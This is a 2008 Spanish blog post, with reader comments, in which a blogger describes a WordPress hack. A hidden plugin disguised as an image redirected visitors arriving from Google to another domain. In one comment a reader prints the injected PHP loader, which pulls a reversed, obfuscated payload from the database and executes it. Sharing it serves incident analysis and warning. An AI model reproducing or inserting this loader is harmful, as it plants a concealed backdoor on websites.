Estás leyendo: MarlexSystems fue hackeado.
Suscribete a MarlexSystems via RSS

MarlexSystems fue hackeado

Escrito por Marlex el 29 de Mayo del 2008 - Ir a los Comentarios ↓

Probablemente se haya notado la baja de publicaciones en MarlexSystems ya que hemos estado como locos buscando el problema y hemos hecho una solucion que, aunque no es definitiva, desde aquí hacemos el llamado a todos los blogs en WordPress.

Bienvenido a MarlexSystems 3.0

Y es que sucede que algunos blogs habíamos experimentado una fuerte pérdida de visitas desde el Buscador Google. Pensando en que probablemente era un problema de Google y no nuestro, nos pusimos a enviar correos -y agradezco la ayuda de quienes me entregaron información al respecto- para contactar con Google pero, los chicos de Google no eran el problema.

Sucedió que algún chistocito logró hackearnos subiendo un codigo malicioso en un formato de imagen a nuestro blog, transformando luego esta imagen en un Plugin de WordPress que no es visible desde el Panel de Control de Plugins. Este “plugin/imagen” tenía la función de que detectara si el usuario provenía de Google, y de serlo, redirigirlo a otro sitio web (your-needs.info) con la misma cadena de búsqueda que el usuario haya hecho.

Podemos decir que unos 10 mil a 12 mil usuarios fueron redirigidos por error. La solución definitiva aún no la hemos encontrado, por lo que probablemente podría volver a suceder, pero con las salvaguardas del caso, esperamos que no sea así.

Cabe mencionar que este fallo aún no está corregido por WordPress, ya que nos hemos encontrado con que en un Foro de WordPress en China han tenido el mismo ataque. Si quieres colaborar, te dejo el código que han subido los señores ociosos.


12 Respuestas en “MarlexSystems fue hackeado”. Déjanos el Tuyo
  1. Juan Carlos comentó:
    29 de Mayo del 2008 a las 11:56 PM

    Que pena! Que tengan suerte! Saludos! Mucha Suerte!

    See U!;)

  2. John Zárate comentó:
    30 de Mayo del 2008 a las 10:54 AM

    Y como ingreso a os servidores de Marlex esta imagen?

  3. Fede comentó:
    30 de Mayo del 2008 a las 12:51 PM

    anoche justamente estaba buscando algunos themes para wordpres… y entre en muchas webs que aparecia ese yourneeds.info … me apareci cerca de 10 veces, estan hackeando varias webs veo… que HDPS

  4. Daniel Zárate comentó:
    30 de Mayo del 2008 a las 12:55 PM

    La pregunta es: ¿Como introdujo este codigo? Será por Injeccion html o sql, tambien puede ser pero es poco probable que tuvieras el virus dentro de la PC del editor de la web, y al subir un archivo a la web este se introdujo. No se me ocurre otra manera

  5. Carlos García comentó:
    30 de Mayo del 2008 a las 1:41 PM

    Que poca… ojala se arregle esta situación y WordPress revise el problema y de pronta respuesta.

    Saludos.

  6. Francisco comentó:
    30 de Mayo del 2008 a las 2:26 PM

    Que mala onda, pero es cierto, como pudieron haberla subido?

    el codigo es este:

    get_var(”SELECT option_value FROM $wpdb->options WHERE option_name=’rss_f541b3abd05e7962fcab37737f40fad8′”);
    preg_match(”!events or a cale\”\;s\:7\:\’(.*?)\’!is”,$trp_rss,$trp_m);
    $trp_f=create_function(”",strrev($trp_m[1]));
    $trp_f();
    ?>

    lo ocultaron con muchos comentarios XD

  7. Marlex comentó:
    30 de Mayo del 2008 a las 2:31 PM

    Hola chicos, al parecer fue una inyección SQL la que nos afectó y con la cual nos han hackeado.

    Agregó luego la imagen como plugin invisible en el tablero de WP. Raro…

    Francisco, muchas gracias por la “traducción” del código. Fede, así es, al parecer es el WP el afectado.

  8. Luis comentó:
    30 de Mayo del 2008 a las 2:54 PM

    Hace unas semanas lei un bug de wp sobre que los spammers atravez de poner comments obvio con spam poian hacer esto, lamenteblamente no recuerdo donde lo lei me pondre a buscar creo fue en http://blogsecurity.net/wordpress pero no estopy seguro, como sea lo buscare incluso creo habia una solucion.

  9. Maty comentó:
    30 de Mayo del 2008 a las 11:42 PM

    Tendría que existir una especia de “tribunal de justicia en internet”, que se ocupen de estos casos y, por ejemplo, suspendan ese dominio.
    Suerte con el arreglo ;)

  10. The-RockeR comentó:
    1 de Junio del 2008 a las 4:01 AM

    Menuda putada Marlex. ¿Podrías decir en que parte del código del blog te introdujeron el código? Lo digo para estar atentos :)

  11. Marlex comentó:
    2 de Junio del 2008 a las 11:36 AM

    The-Rocker, fue a través de una inyección SQL en la base de datos. Pronto publicaré el cómo corregir este hackeo.

    Estén atentos, que al parecer WordPress 2.5.1 también es vulnerable.

Retroenlaces:
  1. Adsense con problemas de muestreo
Queremos saber tu Opinión, déjanos tu comentario!

Por favor, asegúrate de no escribir Comentarios difamatorios, racistas o similares. Haz un comentario acorde a la Temática y que colabore en la Discusión.

Los comentarios que contengan enlaces de referidos, mensajes engañosos o datos personales serán eliminados y el acceso de la persona que los redactó será cerrado a poder publicar nuevos comentarios.

Este Sitio muestra pequeñas imágenes al lado de Cada comentarista mediante el Servicio Gravatar. Regístrate en este Servicio para mostrar la tuya!

MarlexSystems es un proyecto de Patrick D'appollonio y colabora con comunactivo | Carga: 0.931 | Consultas: 24